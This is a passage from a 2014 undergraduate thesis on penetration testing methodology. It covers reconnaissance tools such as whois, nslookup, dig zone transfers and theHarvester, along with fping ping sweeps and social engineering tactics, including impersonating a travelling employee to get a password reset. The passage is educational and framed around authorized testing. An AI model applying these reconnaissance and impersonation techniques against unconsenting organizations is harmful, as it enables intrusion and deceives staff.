Anda di halaman 1dari 131

ACCRA INSTITUTE OF TECHNOLOGY (AIT)

ADVANCED NETWORK HACKING AND PENETRATION TECHNIQUES

BY

WILSON WISDOM AGBOBLI


(BSC IT IN NETWORK COMPUTING WITH HONOURS -BITN)

Thesis Submitted in Partial Fulfillment of the Requirements for the


Bachelor of Science in Network Computing.

PROJECT SUPERVISOR:
MR. MICHAEL OBIRI

NOVEMBER 2014

DECLARATION & AUTHORSHIP

SIGNED COPYRIGHT/DECLARATION OF AUTHORSHIP

This is to declare that, the research work underlying this Thesis has been carried out by the
under-mentioned student under the supervision of the under-mentioned supervisor. Both student
and the supervisor certifies that the work documented in this Thesis is the output of the research
conducted by the student as part of his final year project work in partial fulfillment of the
requirement of the BSc in Information Technology in Networking computing with Honours
-(BITN)

FULL NAME OF STUDENT

NAME OF SUPERVISOR

-----------------------------------Signature

-----------------------------Signature

Date ___________

Date_____________

ii

ABSTRACT

With the emergence of network globalization and advent of internet being the major tool for
international exchange of information, security has always been the most talked about the topic.
Although there are many ways to secure systems and applications, the only way to truly know
how to secure the network is to test it using some testing procedures.
Hacking and Penetration testing is a testing procedure that is performed to test the perimeter of a
network for security breaches and vulnerabilities. Penetration testing is also known as ethical
hacking because the test is performed by a team of security experts that have the organizations
permission to hack the network in an attempt to identify vulnerabilities.
If vulnerabilities are discovered it helps the organization to defend itself against further attacks.
By using the same tools and methodologies hackers use, administrators can test their security
procedures and discover vulnerabilities before they are exploited by someone else.
Any security issues that are found will be presented to the system owner, together with an
assessment of their impact, and often with proposal for mitigation or a technical solution. Thus
all the work is done in a proper manner.

iii

ACKNOWLEDGMENT

I would like to thank the almighty God for His guidance, empowerment, mercy and good health
throughout my academic pursuits and particularly my thesis.
No volume of words is enough to express my sincere gratitude towards my thesis supervisor Mr Michael
Obiri, Manager of Network Systems and Support Unit, and a lecturer at Accra Institute of Technology
for his immense guidance, selfless dedication and empowerment.
Finally, I wish to express my deep gratitude to all my siblings, Ruben, Cephas, Favour, Edem, Eyram
and not forgotten my loyal friend at Ho Polytechnic Rabbi Blagogee for their moral support.

iv

DEDICATION

I humbly dedicate this work to the Almighty God for showing His faithfulness by guiding me
through my thesis successfully and the four years I spent pursuing this programme.
I further dedicate this to my beloved parents Mr & Mrs Gabriel Agbobli, In addition; I again
dedicate this work to my wife, Mrs Felicia Agbobli and our lovely children Jared Makafui
Agbobli, Kendra Fafali Agbobli and Janelle Klenam Agbobli for their support.
Last but not the least; I thank Mr Moses Ofosu-hene, Lecturer and an administrative staff at
Accra Institute of Technology (AIT) for his motivation and encouragement when the going
becomes tough in pursuing my programme.

TABLE OF CONTENTS
TITLE PAGE ...............i
DECLARATION OF AUTHORSHIP.....ii
ABSTRACT iii
ACKNOWLEDGMENT ....iv
DEDICATION.....v
TABLE OF CONTENTS . .vi
LIST OF FIGURES...............vii
LIST OF TABLES..viii
ABBREVIATION & ACRONYMS.ix
CHAPTER ONE ...1
1.0. Introduction...1
1.1.

Objective of the Study...2

1.2.

Research Problem Statement..2

1.3.

Research Question.3

1.4.

Background & Justification of Study.3

1.5.

Significance of the Study4

1.6.

Limitation & Delimitation..4.

1.7.

Definition of Terms.5

CHAPTER TWO6
2.1. Introduction ...6
2.2. Reconnaissance .6
2.2.1. Social Engineering 10
2.3. Scanning and Enumeration ..11
2.3.1. Vulnerability Scanning ..12
2.4. Exploitation and Privilege Escalation ..17
2.4.1. Privilege Escalation ..19
2.5. Conclusion ...20
CHAPTER THREE.30
3.0 Introduction..30

vi

3.1 Information gathering30


3.1.1 Active Reconnaissance tool31
3.2 Passive Reconnaissance techniques..37
3.3 Scanning43
3.3.1 Network discovery information tools43
3.3.2 Scanning network ports & service identification..46
3.3.3 Wireless discovery & scanning tools52
3.3.4 Web application discovery/scanning tools55
3.4 Vulnerability analyses..60
3.4.1 Vulnerability scanning..60
3.4.2 Network vulnerability scanning tools...63
3.5 Attacking phase65
3.5.1 Gaining access tools..65
3.6 Vulnerability exploitation tool68
3.7 Wireless attacking tool71
3.8 Browser exploitation framework78
3.9 Evading defenses & Erasing tracks79
CHAPTER FOUR.82
4.0 Introduction.82
4.1 Propose framework for Netw. Pen-testing..82
4.2 planning83
4.2.1 Requirement for a pen-testing.84
4.3 Information or Intelligence gathering.85
4.3.2 Maltego .. 85
4.4 Scanning and Vulnerability Assessment.....90
4.4.1 Network Mapping (Nmap)..90
4.4.2 Zenmap91
4.5 Exploitation/ Attack95
4.5.1 Privilege Escalation.101
4.6 Using Armitage for Attack.101
4.7 Compromise the target machine103

vii

4.8 Report109
CHAPTER FIVE...111
5.1 Analysis and Discussion.111
5.2 Reflection on the Propose methodology112
5.3 Contribution...113
5.4 Future work114
5.5 Conclusion 115
5.6 Reflection .116

LIST OF TABLES
Table 4.15101
Table 4.16 ...104
Table 4.17105
Table 4.18106
Table 4.19107
Table 4.20110

LIST OF FIGURES
Figure 2.1 ..12
Figure 2.2 ..13
Figure 2.3 ..14
Figure 2.4 ..15
Figure 2.5 .21

viii

Figure 2.6 .22


Figure 2.7 .22
Figure 2.8 .23
Figure 2.9 .27
Figure 2.10 ...28
Figure 3.1 .34
Figure 3.2..35
Figure 3.3..36
Figure 3.4..37
Figure 3.5.37
Figure 3.6.39
Figure 3.7.40
Figure 3.8.41
Figure 3.9.42
Figure 3.10...42
Figure 3.1143
Figure 3.12...43
Figure 3.1345
Figure 3.1449
Figure 3.1549
Figure 3.16.......50
Figure 3.1754
Figure 3.1854
Figure 3.1957
Figure 3.2057
Figure 3.2158
Figure 3.2260
Figure 3.2361
Figure 3.2466
Figure 3.2568
Figure 3.26..69

ix

Figure 3.27..70
Figure 3.28..71
Figure 3.29..73
Figure 3.30..73
Figure 3.31..74
Figure 3.32..74
Figure 3.33.76
Figure 3.34.76
Figure 3.35.76
Figure 3.36.77
Figure 3.37.77
Figure 3.38.78
Figure 4.1...82
Figure 4.2...86
Figure 4.3 ..87
Figure 4.4..88
Figure 4.5..89
Figure 4.6..92
Figure 4.7..92
Figure 4.8 93
Figure 4.9 97
Figure 4.10...98
Figure 4.11 .98
Figure 4.12.99
Figure 4.13 100
Figure 4.14 101
Figure 4.16104
Figure 4.17105
Figure 4.18 ..106
Figure 4.19 .107
Figure 4.20 .110

ABBREVIATION & ACRONYMS

ISP

Internet Service Provider

IDS

Intrusion Detection System

DNC

Domain Name Server

IP

Internet Protocol

TCP

Transmission Control Protocol

UDP

User Datagram Protocol

GUI

Graphic User Interface

NMAP

Network Mapper

ICMP

Internet Control Protocol

FTP

File Transport Protocol

HTTP

HyperText Protocol

IMAP

Internet Message Access Protocol

MS-SQL

Microsoft Structure Query Language

My-SQL

My Structure Query Language

NCP

NetWare Core Protocol

NNTP

Network News Transport Protocol

POP3

Post Office Protocol 3

REXEC

Remote Execution

RLOGIN

Remote Login

SMTP

Simple Mail Transport Protocol

SMTP-AUTH Simple Mail Transport Protocol Authentication


SNMP

Simple Network Management Protocol

SSHV2

Secure Shell Version 2

TELNET

TELephone NETwork

VNC

Virtual Network Computing

SVN

(Apache) Subversion

xi

xii

xiii

CHAPTER ONE

1.0. INTRODUCTION

About two or three decades ago, people were quite happy to leave their houses and cars unlocked
due to low crime levels. However, time has changed now and the world is fast becoming an
unsecured place to live especially for organizations which deal with influx of heavy data on daily
basis, since security has always been an important issue due to network globalization and
internet. However, Ethical hacking and penetration techniques are preventive measures which
consist of a chain of legitimate tools that identify and exploit a companys security weaknesses.
Ethical hacking and penetration testing is a platform to find out flaws in network systems.
Vulnerability assessment takes a center stage in finding the weakness of networks and exploiting
such vulnerabilities to detect weakness of the network. Penetration testing in general involves a
lot of techniques such as social engineering and reconnaissance and most importantly
methodologies for using the require tools.
In these entire activities penetration test is undertaken to find flaws in information systems which
will determine a lasting solution to mitigate those vulnerabilities before black hat hackers take
advantages of the systems.

1.1. OBJECTIVE OF THE STUDY

Global Objective
Penetration testing is one of the oldest methods for assessing the security of a computer system.
In the early 1970s, the Department of Defense used this method used this method to demonstrate
the security weaknesses in computer systems and to initiate the development of programs to
create more secure systems. Penetration testing is increasingly used by organizations to assure
the security of information systems and services, so that security weaknesses can be fixed before
they get exposed.

The purpose of this exercise is to identify methods of gaining access to a system by using
common tools and techniques used by hackers. A real word example shows that how an attacker
first exploit any vulnerable system and then take control over it.
According to a real world example, a house has a weak lock on the door, say vulnerability. A
thief comes with a bunch of keys with him. He knows exactly which key will be used to open the
door, this is selecting appropriate exploit from many. After entering into the house, he can steal
something, can leave a backdoor open, can make a duplicate key or can change the lock for his
uninterrupted entry. Hence, this is called the Payload.
Penetration testing can be defined as Security oriented probing of a computer system on
network to seek out vulnerabilities that an attacker could use known vulnerabilities in an attempt
to perform an intrusion into host, network or application resources.
The goal of a penetration test is to increase the security of the computing resources being tested.
It is important for the pen-tester to keep detailed notes about how the tests were done so that the
results can be verified and any issues that were uncovered could be resolved.
Hacking is basically a technique to log-on into any system illegally or without the consent of the
user and penetration testing serve as a process to know flaws or vulnerabilities a network or a
system. The global objective for this thesis is to find out most well-known hacking and pen test
tools and how they are applied.
Not forgotten reconnaissance which is the core element in hacking, which made up of passive
and active reconnaissance.
Ethical hacking is a concept of using hacking and attacking techniques to find and exploit
vulnerabilities and access the network system by penetration for the purpose of improving
system security. The central concept is to practically apply the techniques involve in Hacking and
Penetration testing which will unveil vulnerabilities in a network system for security
improvement and reconnaissance.

Specific objectives
My main specific objective is to have full knowledge in applying reconnaissance in all categories
in black box penetration and testing, vulnerability assessment, penetration testing and most
importantly in achieving all these, the require tools to mitigate such act into a network. Accurate

tools and methods use to access the flaws found in a network system and how to exploit such
weaknesses and enable such security vulnerabilities to be block for hackers.
The core specific objectives of this important study are as follows;

The use of well-known software tools for hacking

The importance of active and passive reconnaissance techniques

Prevention of network systems information into public domain

Software tools for hacking countermeasures

The need of penetration testing

Delving into the following list of bulletin will give the ready the broad knowledge of hacking
techniques and it countermeasures however, it will also give readers the platform how to prevent
organization information into the public domain especially those that are to be kept secret.

1.2. RESEARCH PROBLEM STATEMENT

Ethical Hacking and Penetration Test is concise where vulnerabilities are found in an information
system and such acts are done in consultation with owners of the network. Notwithstanding,
social engineering is the art of utilizing human behavior to breach security without the
participant even realizing that they have been manipulated. Sometime black hat hackers get their
chance when there are genuine gaps in the security that they can breach

The problem statements of advance hacking and penetration techniques are as follows;
Ninety percent (90%) of Social engineering techniques are used for active and passive
reconnaissance for the targeted network.
Weak genuine security implementation gaps in networks.
How to eliminate two main category of social engineering techniques
Technology based deception
Human based deception

Tools such as softwares and methods available to restrict black hat hackers after
applying penetration test.
Software tools used to identify vulnerabilities in an information systems and techniques
to prevent such flaws.
Legal implication when red team expose vulnerabilities found after penetration testing
when proper legal agreement has been sign by the parties informed.

The reason behind all this exploration is to know how to build well secured network infrastructure
and information system.

1.3. RESEARCH QUESTIONS

With business of e-commerce on its peak, more sensitive information is being passes around on
computer networks. Financial and identify information are at a high risk of being stolen or
modified as legitimate and illegal users take advantage of the ease of doing business online
through web applications.
Sensitive user information is constantly transported between sessions after authentication and
hackers are putting their best effort to steal, modify and even damage the system housing data.
Computer networks face a variety of serious threat and risks. These threats are based on
vulnerabilities are in many ways especially with Address Resolution Protocol (ARP) uses a pick
me approach to resolving computer on a network. When computer A tries to communicate with
B. ARP sends out a broadcast to the network devices asking who is B? But there is no
authentication built into ARP and thus ARP has no way of determining whether the response
(pick me) is really B or not. By exploiting this lack of authentication, a malicious computer can
tell ARP it is computer B, after which ARP will begin directing future requests for computer B to
the malicious computer.
The final consequence is the disclosure of data which can be an act of economic terrorism,
alteration of data such as grade fixing and denial-of-service attacks including synchronization
(SYN) flood and smurfing.

This statement showcase just a bit of flaw you can find in a computer network system where
hackers can take advantage to illegally compromise with your machine. The studies seek to
investigate the techniques of hacking, conducting penetration testing, and most importantly
measures to be implemented to mitigate or prevent hacking.
The study seeks to answer the following questions;
Techniques behind hacking
Benefit of penetration testing and it laws
Techniques or measures to mitigate or prevent hacking
Software tools for hacking and penetration testing

1.4. BACKGROUND AND JUSTIFICATION OF STUDY

Two to three decades ago, people would be quite happy to leave their houses and cars unlocked
and even doors to their houses left wide open due to low crime levels. However, time has
changed now and the world is getting a much worse place to live and work in since, security has
always been important issue due to network globalization and internet, attackers are always
looking to violate it for further usage.
Over the past many years, it has been common to hear about various types of attackers on
various networking, financial and many more organizations. Time has come where protection is
must from everyone out there whether from hacking attackers or script kiddies. For better
protection, it is good to know about current and past vulnerabilities and patch all equipment as
soon as vulnerability patches are available. However, this alone is not sufficient.
Everyone is human, and mistakes will be there. Whether its granting full access permission to a
server by accident or not setting a password on the administrator account because it makes life
easier to manage. No matter how much patching is done, the systems can still be vulnerable to
attack. Thus, need of a framework was there, which could provide assurance of a secure network
by finding the weakness before it get exposed. This is where Penetration at Testing comes in.

In todays world, money has dominated every department of human life than trustworthiness.
However, because most business transactions have been automated, criminals need higher
knowledge to conduct computerized crimes. Most businesses have a lot of vulnerabilities in their
computer systems which can be a privilege to be used to illegally hack into their network
systems for personals and other gains. After completion of this project, loop-holes in
information systems will be identified and mechanisms to seal them off (which is the paramount
aim of this project) will be outlined.
In Ghana, most programmers are developing programs for small and large scale businesses
without any penetration testing to show the security level of these programs. Therefore, any new
software or program that will be implemented in my domain will be subjected to ethical hacking
and penetration testing to find out if it has any vulnerability.
The outcome will spell-out general weaknesses in network designs. This research will bring out
the number of TCP and UDP open ports, weaknesses in application softwares, easy gathering of
active and passive reconnaissance. The benefit of this project can be a road map for measures to
be implemented to mitigate or prevent hackers detecting weaknesses in your network design.

1.5. SIGNIFICANCE OF THE STUDY

The importance of this study is strictly focusing on white hat hacking which is a legitimate
performance in security testing bounded by a contractual agreement. Their main purpose is to
improve the system from its flaws which can then be closed before a real criminal hacker
penetrates willfully.
Moreover, applying penetration testing which is an authorized attempt to intrude into an
organization network to ascertain the exploitation of security vulnerabilities in organization
information systems including techniques adopted in social engineering.
To differentiate between an ethical hacker and a malicious hacker is through examination of the
attackers motivation. If the attacker is motivated or driven by personal gain, including profit
through extortion of other devious method as of collecting money from the victim, revenge,

fame, or the like, he or she should be considered a black hat, these are the element for gathering
information malicious attackers. If the attacker is preauthorized and his or her motivation is to
help the organization and improve their security, he or she can be considered a white hat.

1.6. LIMITATIONS AND DELIMITATION OF THE STUDY

Penetration testing cannot be expected to identify all possible weaknesses, nor does it guarantee
that it is 100% secure. New technology and hacking methods can create new exposures not
anticipated during the penetration testing. Thus, it is certain possible that after a penetration
testing, there could be hacking incidents thereafter because it is impossible to have full but rather
only good protection for an organizations security system.
Penetration testing involves taking computer screen shots or copying sensitive information as
evidence to prove that the system has key security weaknesses. However, there are ,many
restrictions on the extent of information that will be available and legitimately accessible to the
ethical hacker. This prevents a penetration testing from simulating as closely of the malicious
hackers activities because they are not constrained by any limitations. Firstly, penetration testing
may be governed by the laws and contractual obligations of the organizations system because if
the test unintentionally retrieves highly confidential information, this may result in violating the
laws and breaching of contractual agreements.
Finally, companies that outsource their IT infrastructure may restrict similar techniques due to
the licensing agreements. All of these restrictions imply that organizations and ethical hackers
should take additional measures to reduce the risks of unwanted liability by having detailed
written agreements between the company and ethical hacker to define the scope, objective, terms
and any limitations in the engagement. In addition, a penetration testing is usually performed
within limited resources over a specific period of time. Therefore, once an ethical hacker has
identified the current risk and threats exposed to the system, the organization should immediately
take corrective action mitigations these security loopholes and decrease the potential exposure to
malicious hackers.
Limitation is the shortcoming conditions or influence that I cannot control that places restrictions
on my methodology and the following conclusions.

This study is limited to

Getting the right information will not be possible.

Acquiring the right or required software tools for penetration testing.

Incorrect data will be collected when questionnaires are distributed in the domains of
Banks, Internet Service Providers (ISP) and other data centers.

Evaluation software tools without adequate features.

Delimitations of the study are:


Full penetration testing
Denial of service testing
Scanning a network or systems
Social engineering techniques
To know varieties of software testing tools and how they are used.
Learn all the techniques of active and inactive Reconnaissance

An organization should consider penetration testing as part of its overall security strategy based
on two factors: significance and likelihood of security exploitation by malicious hackers.
Security controls are the foundation of trust placed by stakeholders in the organization. Thus, the
significance relates to the degree of the breach in trust by customers, employees and other
stakeholders. The likelihood of occurrence relates to the target of choice and target of
opportunity. If an organization is large in size and has a high profile, such as the government or
banks, they are the preferred target. If an organization has a lack of security controls, they are
more susceptible to the higher incidence for attacks due to the relative ease of access.
Therefore, if an organization estimates its security breaches would result in high significance and
likelihood, then it may be cost-beneficial to run-combined automated and manual penetration
testing with various internal and external techniques as part of it security strategy.

1.7.

DEFINITION OF TERMS
Reconnaissance: An information gathering step is the process of searching for valuable
information used in a penetration testing.
Social Engineering: Trick someone for doing something for you without his/her
consents, especially giving out information which you will not be able to gain access to.
Ports: a numerical numbers associated or represent application software in computer
systems.
Scanning: tool for scanning networks or information system to acquire port numbers and
IP address etc.
Denial of service: Is a form of attack where consistent packet will be sent to server, with
adulterated header from the workstation however, the server buffer will receive more
than necessary packet without any acknowledgment which will freeze the server.

CHAPTER TWO

LITERATURE REVIEW

2.1. INTRODUCTION
Advance Hacking and Penetration Techniques totally spell out techniques such as passive and
active reconnaissance and social engineering which are the first and foremost method for
information gathering including security flaws identify in network systems.
However, its very important to know measures and techniques with users to be implemented to
avoid preliminary information gathering as well as identifying security vulnerabilities and
putting measures to block such loopholes. Penetration techniques must be applied to testify the
robustness and durability of network systems because a software or program can have security
flaws which must be put under test.
This study will review many researched conducted on this topic. The body of the literature may
be classified under the following, active reconnaissance tools will be used intensively for
vulnerabilities gathering, passive and social engineering techniques will also be applied
practically to gain valuable information, measures will be derived on how to educate computers
users in an institution to hold on to information that is not meant for public consumption.
Additionally, exploring available penetration testing or hacking software tools used to find out
flaws or vulnerabilities in network systems and the necessary techniques to be adapted.
The body of the literature may be classified under four main headings namely, Reconnaissance,
Scanning and Enumeration, Exploitation and Privilege Escalation, Evading Defense and Erasing
tracks. Review of many articles and books researching on current technological trend adapted in
the 21st century in the environment of hacking techniques.

2.2 Reconnaissance:
A malicious user meaning a rogue employee, contractor, or other user who abuses his or her
privileges is a common term in security circles and in headlines about information breaches. A
long standing statistic states that insiders carry out 80 percent of all security breaches.
Hackers are very good at one thing: getting inside your head and you dont even know it. They
are systematic and methodical in gathering all pieces of information related to the technologies

10

used in your environment. Footprint is the determination of potential security exposures of a


particular network system. A good information gatherer is made up of equal parts: hacker, social
engineer, and private investigator. Good criminal spend months planning, scheming (to make
clever secret plans which often deceive others), organizing, and receiving details before the heist
(a crime in which valuable items are taken illegally).
The major question an aspiring hacker asks is How do I go from a single company name to
owning the systems inside the network? After knowing the only name of the company, however
the first step in reconnaissance is to begin by conducting a thorough search of public
information. Although it should be pointed out that some tools or techniques used in
reconnaissance do in fact send information directly to the target, it is important to know the
difference between which tools do and which tools do not touch the target. There are two main
goals in this phase: first, we need to gather as much information as possible about the target;
second, we need to sort through all the information gathered and create a list of attackable IP
addresses.
To be successfully at reconnaissance, you must have a strategy, nearly all facets on information
gathering leverage the power of the internet. A typical strategy needs to include both active and
passive reconnaissance.
Active Reconnaissance includes interacting directly with the target. It is important to note that
during this process, the target may record our IP address and log our activity.
Passive reconnaissance makes use of the vast amount of information available on the web.
When we are conducting passive reconnaissance, we are not interacting directly with the target
and as such, the target has no way of knowing, recording, or logging our activity. In most case,
the first activity is to locate the target website by using a website copier known as HTTrack, we
begin step 1 by closely receiving the targets website. In some cases, we may actually use a tool
called HTTrack to make a page-by-page copy of the website. HTTrack is a utility that creates an
identical, off-line copy of the target website. The copied website will include all the pages, links,
pictures, and code from the original websites; however, it will reside on your local computer.
Please be aware that this activity is easy to trace and considered highly offensive and never run
this tool without prior authorization. Once HTTrack has finished copying the target website, it
will present you with a webpage allowing you to Browse the Mirrored Website in a browser or
navigate to the path where the site was stored.

11

HTTrack website copier shows the web base image of how a website is mirror unto another
machine.

Figure 2.1: HTTrack website copier

It is very difficult, if not impossible, for a company to determine when a hacker or penetration
tester is conducting passive reconnaissance. This activity offers a low-risk, high-reward situation
for attackers. Recall that passive reconnaissance is conducted without ever sending a single
packet to the target systems. Our weapon of choice to perform this task is the internet.
An excellent tool to use in reconnaissance is the HARVESTER. The Harvester is a simple but
highly effective Python script written by Christian Martorella at Edge Security. This tool allows
us to quickly and accurately catalog both e-mail address and subdomains that are directly related
to our target.
As you can see, the Harvester was effective in locating at least two e-mail addresses that could
be of value to us. Please note the email address in the screenshot have been circled and
obfuscated. The Harvester was also successful

12

Figure 2.2 Output of the Harvester.


in finding at least two additional subdomains. Both booksite.syngress.com and
ebook_www.syngress.com need to be fully recond. We simply add these new domains to our
target list and begin the reconnaissance process again.
Reconnaissance is very cyclical because in-depth reconnaissance often leads to the discovery of
new targets, which in turn leads to additional reconnaissance. As a result, the amount of time to
complete this phase will vary from several hours to several weeks. Remember, a determined
malicious hacker understands not only the power of good reconnaissance but also that of a nearly
limitless amount of time. As an aspiring penetration tester, you should devote as much time as
possible to practicing and conducting information gathering.
A very simple but effective means of collecting additional information about our target is Whois.
The Whois service allows us to access specific information about our target including the IP
addresses or host names of the companys Domain Name Systems (DNS) servers and contact
information usually containing as address and phone numbers. Whois is built into Linux
operating system. The simplest way to use this service is to open a terminal and enter the
following command by using backtrack Linux for penetration testing purposes.

13

Figure 2.3
Partial output from a Whois Query

Example to find out information about syngress, we would issue the following command:
Whois syngress.com. Figure 2.2 shows a partial output from the result of this tool.
It is important to record all the information and pay special attention to the DNS servers. If the
DNS servers are listed by name only, as shown in figure 2.2, we will use the Host command to
translate those names into IP addresses.
In terms of reconnaissance, gaining full access to a companys DNS server is like finding a pot of
gold at the end of a rainbow. Or maybe, more accurately, it is like finding a blueprint to the
organization.

NS LOOKUP: The first tool we will use to examine DNS is NS Lookup. NS Lookup is a tool
that can be used to query DNS servers and potentially obtain records about the various host of
which it is aware. NS Lookup is built into many versions of Linux including Backtrack and is
even available via the windows command prompt!

NSLookup operates very similarly between

the various operating systems.


However, you should always review the specifics for your particular system. You can do so in
Linux by reviewing the NS Lookup man pages. This is accomplished by opening a terminal and
typing:
root@bt~#man nslookup

14

NS Lookup is a tool that can be run in interactive mode. This simply means we will first invoke
the program and then feed it on the particular switches we need to make it function properly. We
begin using NS Lookup by opening a terminal and entering:
root@bt~# nslookup
By issuing the nslookup command, we start the NS Lookup tool from the operating system
however, after typing nslookup and hitting enter, your usual # prompt will be replaced with a
> prompt. At this point you can enter additional information required for NS Lookup to
function.
We begin feeding commands to NS Lookup by entering the server keyword and an IP address
of the DNS server you want to query. An example follows:
server 41.66.193.148
NS Lookup will simply accept the command and present you with another > prompt. Next, we
specify the type of record we are looking for. During the reconnaissance process, there are many
types of records that you may be interested in.
For a complete listing of the various DNS record types and their description, you can use your
newly acquired Google skills. If you are looking for general information, you should set the type
to any by using the keyword any:
set type = any
If you are looking for specific information from the DNS server such as the IP address of the
email server that handles email for the target organization, we should use the set type 5 mx.

15

Figure 2.4 Using Host and NS Lookup to Determine the Email of our Target.

We wrap up our initial DNS interrogation with NS Lookup by entering the target domain after
the next > prompt.

Dig is another great tool for extracting information from DNS. To work with dig, we simply
open a terminal and enter the following command:
dig @target_ip
Naturally, you will need to replace the target _ip with the actual IP address of your target and
among other things; dig makes it very simple to attempt a zone transfer. Recall that a zone
transfer is used to pull multiple records from a DNS server. In some cases, a zone transfer can
result in the target DNS server sending all the records it contains. This is especially valuable if
your target does not distinguish between internal and external IPs when conducting a zone
transfer.
If we wanted to attempt a zone transfer against a fictitious DNS server with an IP address of
example 192.168.1.23 and a domain name of example.com we would issue the following
command in a terminal window:
dig @192.168.1.23 example.com t AXFR
If zone transfer are allowed and not restricted, you will be presented with a listing of host and IP
addresses from the target DNS server that relate to your target domain. Backtrack has many
additional tools that can be used to interact with DNS, however, these tools should be explored
and utilized once you have a solid understanding of how DNS works.
Email Servers can provide a wealth of information for hackers and penetration testers. In many
ways, e-mail is like a revolving door to your targets organization. Assuming your target is
hosting their own e-mail server, this is often a great place to attack. It is important to remember,
You cant block what you must let in however, in other words for e-mail to function properly,
external traffic must pass through your border devices like routers and firewalls, to an internal
machine, typically somewhere inside your protected networks.
As a result of this, we can often gather significant pieces information by interacting directly with
the e-mail server. One of the first things to do when attempting to reconnaissance an email server
is to send an email to the organization with an empty.bat file or a non-malicious .exe file like

16

calc.exe. In this case, the goal is to send a message to the target email server inside the
organization in the hope of having the email server inspect and then reject the message.
Once the rejected message is returned back to us, we can attempt to extract information about the
target email server. In many cases, the body of the message will include a pre-scanned write up
explaining that the server does not accept email with potentially dangerous extensions. This
message often indicates the specific vendor and version of antivirus that was used to scan the
email. As an attacker this is a great piece of information to have.
Having a return message from a target email server also allows us to inspect the headers of the
email. Inspecting the internet headers will often allow us to extract some basic information about
the email server, including IP addresses and the specific software version or brand of the email
server running. Knowing the IP address and software version can be incredibly useful when
move into the exploitation phase.
Another important tool is MetaGooFil is an extraction tool and defined as data about data. When
you create a document like Microsoft Word or PowerPoint presentation, additional data is
created and stored within your file. This file often include various pieces of information that
describe the document including the file name, the file size, the file owner or username of the
person who created the file, and the location or path where the file was save. This process occurs
automatically without any user input or interaction, additionally, MetaGooFil is built into
Backtrack and can be found by navigating to the information gathering section off of the
Backtrack option in the all programs menu.
Many people would argue that social engineering is one of the most simple and effective means
for gathering information about a target.
Social engineering is the process of exploiting the human weakness that is inherent in every
organization. When utilizing social engineering, the attackers goal is to get employee to divulge
(make something secret known) some information that should be kept confidential. Let us take
our social engineering example one step further. Suppose our sales mans name is Kofi Mensah
(we found this information during our reconnaissance of the company website and in the
signature of his email response). Let assume that in this example, when you sent the employee
the product inquiry email, you received an automatic reply with notification that Kofi Mensah
was currently out of the office travelling overseas and would be gone for two weeks with only
limited email access.

17

The classic example of social engineering would be to impersonate Kofi Mensah and call the
target companys tech support number asking for help resetting your password because you are
overseas and cannot access your webmail. If you are lucky, the technical support people will
believe your story and reset the password moreover, successful social engineers must be
supremely confident, knowledgeable of the situation, and flexible enough to go off script. If
you are conducting social engineering over the phone, it can be extremely helpful to have
detailed and well-written notes in case you are asked about some obscure detail.
Once the reconnaissance step is completed, you should have a solid understanding of your target
including the organization, structure, and even technologies deployed inside the company. After
we have thoroughly reviewed the collected reconnaissance and transformed the data into
attackable targets, we should have a list of IPs that either belong to serve or are related to the
target.
Summarizing, reconnaissance is a vital techniques which is very important than even putting in
place the world best firewall on your network and should not be overlooked. Social engineering
has numerous techniques such as

shoulder surfing is a security attack where-in, the attacker uses observation techniques, such as
looking over someone shoulder to get information while performing a task

dumpster diving is a huge organization dump items like company phone books, system manuals,
organization charts, company policy manuals, calendars of meetings, events and vacations,
printouts of sensitive data or login name and passwords, printouts of source code, disks and
tapes, company letterhead and memo forms, and outdated hardware, carelessly dump into the
company dumpsters

Role playing involves persuading or gathering information through the use of an online chat
session, emails, phones or any other method that your company uses to interact with the public,
pretending to be a helpdesk, employee, and technician to divulge in confidential information.

A Trojan horse is most predominant methods currently used by hackers that involve tricking the
victims to download a malicious file to the system they are using.

Phishing is the act of creating and using websites and emails designed to look like those of wellknown legitimate businesses, financial institutions and government agencies to deceive internet
users into disclosing their personal information and falsely claiming to be an establish legitimate

18

enterprise in an attempt to scam the user into surrendering private information that will be used
for identity theft.

2.3. Scanning and enumeration phase: Scanning is the process of identifying live systems and
the services that exist on those systems and this process is divided into three distinct phase;
1. Determining of a system alive
2. Port scanning the system
3. Scanning the system for vulnerabilities

Scanning is the process of determining whether a target system is turned on and capable of
communicating or interacting with our machine? With this our focus is on port scanning and scanning
the system for vulnerabilities. Many common networks services run on standard port numbers and can
give attackers an indication as to the function of the target system. Remember every open port is a
potential gateway into the target system. The fundamental goal of scanning is to identify potential targets
for security holes and vulnerabilities of the target host or network. All the tools used for this phase and
the successive phase must be thoroughly tested environment prior to using them in a live scenario.
Below is the list of some common tools to perform scanning;

Telnet (can report information about an application or service)

Nmap (powerful tool available for Unix that finds ports and services available via IP)

Hping2 (powerful Unix based tool used to gain important information about a network)

Netcat (others have quoted this application as the Swiss Army Knife of network
utilities)

Ping (Available on most every platform and operating system to test for IP connectivity)

Tracroute (maps out the hops of the network to the target device or system)

Queso (can be used for operating system fingerprinting)

Vulnerability scanning is the process of locating and identifying known weaknesses in


the services and software running on a target machine. The discovery of known
vulnerabilities on a target system can be like finding the pot of gold at the end of a
rainbow. Some vulnerability may present little opportunities for an attacker, whereas

19

others will allow you to completely take over and control a machine with a single click of
a button.
First and foremost, we scan perimeter devices such as servers, routers, firewalls or other
equipment which are intermediary between protected internal resources and external networks
like the internet to look for weaknesses or vulnerabilities that will allow us to gain entry into the
network. After the ping telling us that the host machine is alive when not restricted from
responding, the receiving machine will respond back to the originating machine with Echo Reply
packet.
A ping sweep is a series of pings that are automatically sent to a range of IP addresses, rather
than manually entering the individual targets address. The simplest way to run a ping sweep is
with a tool called FPing. FPing is built into Backtrack and is run from the terminal and can also
be downloaded for windows. The easiest way to run FPing is to open terminal window and type
the following as an example: fping -a -g 172.16.45.1 172.16.45.254>hosts.txt. The -a switch
is used to show only the live hosts in our output, however, the -g is used to specify the range of
IP addresses and > is also used to pipe the output to a file and the host.txt is used to specify the
name of the file our results will be saved to.
It is important to remember that not every host will respond to ping request; some hosts may be
firewalled or otherwise blocking ping packets.
After listing targets machines that are alive, recall that the goal of port scanning is to identify
which ports are open and determine what services are available on our target system. There are a
total of 65,536 ports on every computer, ports can be either TCP or UDP depending on the
service utilizing the port or nature of the communication occurring on the port. We scan
computers to see what ports are in use or open. This gives us a better picture of the purpose of
the machine, which, in turn, gives us a better idea about how to attack the box.
Learning the command line version of your tools is critical because once you have control of a
machine you will need to upload your tools and interact with the target through a command
prompt, not through a graphical user interface. When you gain access to your target machine,
you will not be presented with a GUI but rather with a command prompt. If you do not know
how to copy files, add users, modify documents, and make other changes through the command
line, your work of owning the target will have been in vain.

20

